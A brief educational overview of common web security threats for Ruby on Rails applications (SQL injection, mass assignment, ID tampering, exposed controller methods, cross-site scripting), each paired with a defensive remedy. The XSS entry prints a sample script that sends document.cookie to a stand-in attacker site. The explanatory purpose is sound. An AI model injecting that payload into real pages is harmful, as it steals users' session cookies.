Overview of Security Threats
Here is a list of common security threats. None of these are just specific to web applications developed with Ruby on Rails. This list is summarized from Agile Web Development with Rails by Dave Thomas et al.
- SQL Injection. Inserting destructive SQL code in URL or data that gets passed to the database. Solution: sanitize contents (add needed escape characters) that is passed to the database.
- Creating Records from Form Parameters. Example: if model has an admin property, an attacker could add an extra parameter gaining admin priveleges. Solution: make sure that sensitive attributes are not added to the attr_accessible method in the model. These attributes should be set individually in the controller.
- Trusting ID Parameters. Users may edit the URL to request records that do not belong to them. Use the find method to only retrieve records that belong to the user.
- Exposed Controller Methods. Unless the controller method maps to a request, make sure all controller methods are declared protected or private.
- Cross-site scripting. This attack involves stealing a user's cookie by having the vulnerable site send revealing javascript code to the victim's browser:
<script>
document.location="http://badguysite.net/steal/" + document.cookie
</script>
A web application should sanitize (provide escapes for less-than brackets) all user-submitted content that is sent to browsers.